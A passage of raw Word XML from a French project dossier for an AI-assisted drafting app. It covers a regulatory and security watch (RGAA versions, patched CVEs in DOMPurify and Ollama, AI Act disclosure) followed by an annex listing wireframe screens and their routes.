    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>RGAA — la version 5 annoncée pour fin 2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La version 5 du RGAA intégrera les WCAG 2.2, ajoutera des critères pour les applications mobiles et les documents bureautiques, et simplifiera la formulation des critères existants. Sur le plan légal, l'Arcom devient autorité de contrôle et un téléservice est mis en place pour les déclarations d'accessibilité.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Pas de reprise à prévoir.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Le RGAA 4.1.2 reste en vigueur, les déclarations publiées avant la sortie de la version 5 restent valides 18 mois, et la nouvelle version « précise ou complète » les critères sans les infirmer. L'audit d'accessibilité a donc été mené sur le RGAA 4.1.2 (§ 9)</w:t>
      </w:r>
      <w:r/>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— et le dossier nomme désormais cette version explicitement partout où il mentionnait « le RGAA » sans précision.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="146"/>
    <w:bookmarkEnd w:id="147"/>
    <w:bookmarkStart w:id="157" w:name="X401a29fd3162a8985a826792a14805562dd36d8"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Ce que la veille a changé dans le projet</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Priorité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Action</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Origine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Nature</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Mettre à jour DOMPurify vers ^3.4.16 — appliqué le 02/10/2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">CVE-2026-0540</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Dépendance</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Contrôler la version d'Ollama et mettre à jour — appliqué : 0.35.1 installée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">CVE-2026-7482</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Environnement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Ajouter une mention d'information sur l'usage de l'IA au premier usage de l'assistant</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">AI Act</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Fonctionnalité</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Ajouter une clause « contenus générés par IA » aux CGU et à la politique de confidentialité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">AI Act</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Contenu légal</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Préciser « RGAA 4.1.2 » dans tout le dossier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">RGAA 5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Documentation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Documenter la règle : Ollama n'écoute que sur l'interface de bouclage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">CVE-2026-7482</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Déploiement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Activer Dependabot et intégrer npm audit / pip-audit au pipeline d'intégration continue — pipeline en place, étape d'audit restant à ajouter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">axios</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Outillage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Au-delà de ces sept actions, la veille a produit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">trois enseignements</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">qui ont modifié la façon dont je présente le projet lui-même :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2026"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Le canal de distribution fait partie de la surface d'attaque.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Vérifier le code d'une dépendance ne suffit pas si l'on ne maîtrise pas la version effectivement installée. Le fichier de verrouillage devient un artefact de sécurité (§ 4).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2026"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Une brique de sécurité se maintient comme le reste.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>DOMPurify corrige une faille et en introduit une autre ; seule la défense en profondeur reste stable dans le temps (§ 7.1).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2026"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Le cadre réglementaire bouge pendant le projet.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Un cahier des charges n'est pas un contrat figé face au droit : il faut y confronter l'actualité normative, pas seulement les spécifications d'origine (§ 2).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E01DF46" w14:textId="77777777" w:rsidR="00B1648B" w:rsidRPr="00B1648B" w:rsidRDefault="00B1648B" w:rsidP="00B1648B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:sectPr w:rsidR="00B1648B" w:rsidRPr="00B1648B" w:rsidSect="003A2DEC">
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1134" w:right="1134" w:bottom="1134" w:left="1134" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="598335ED" w14:textId="7A402884" w:rsidR="003A2DEC" w:rsidRPr="003A2DEC" w:rsidRDefault="003A2DEC" w:rsidP="003A2DEC">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A2DEC">
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ANNEXES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B8A5AF" w14:textId="03A4AA59" w:rsidR="003A2DEC" w:rsidRDefault="00690DDD" w:rsidP="003A2DEC">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc198828321"/>
      <w:r>
        <w:t>Les</w:t>
      </w:r>
      <w:r w:rsidR="003A2DEC">
        <w:t xml:space="preserve"> maquettes des interfaces utilisateur</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
      <w:r w:rsidR="003A2DEC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Les neuf planches de wireframes sont reproduites ci-après, dans l'ordre du parcours utilisateur. Chaque planche associe la représentation de l'écran et ses intentions de conception numérotées.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0" w:val="0020"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblLayout w:type="autofit"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2640"/>
        <w:gridCol w:w="2640"/>
        <w:gridCol w:w="2640"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Planche</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Titre</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Écran ou route</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">W-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Accueil</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">W-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Inscription</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/register</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">W-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Connexion et récupération</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/login</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">·</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/forgot-password</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">·</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/reset-password</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">W-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Tableau de bord</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/dashboard</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">W-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Liste des documents</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/documents</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">W-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Éditeur de document</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/documents/:id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">W-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Assistant IA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">surcouche modale de</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/documents/:id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">W-08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Back-office</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">W-09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Enchaînement des écrans</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">vue d'ensemble</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Légende commune aux planches : trait plein épais pour un écran ou un bloc principal, trait fin pour un élément secondaire, trait discontinu pour une zone d'accès ou une transition conditionnelle, aplat gris pour un contenu textuel non figé. Les pastilles numérotées renvoient aux intentions de conception listées à droite de chaque planche.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t>Le fichier source des planches est docs/maquettes-helpmedraft.html dans le dépôt.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5688000" cy="2588620"/>
            <wp:docPr id="10" name="Picture 10"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image1.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5688000" cy="2588620"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>W-01 — Accueil (/). Composition de la page d'entrée, place du footer légal.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5688000" cy="3325739"/>
            <wp:docPr id="11" name="Picture 11"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image2.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5688000" cy="3325739"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
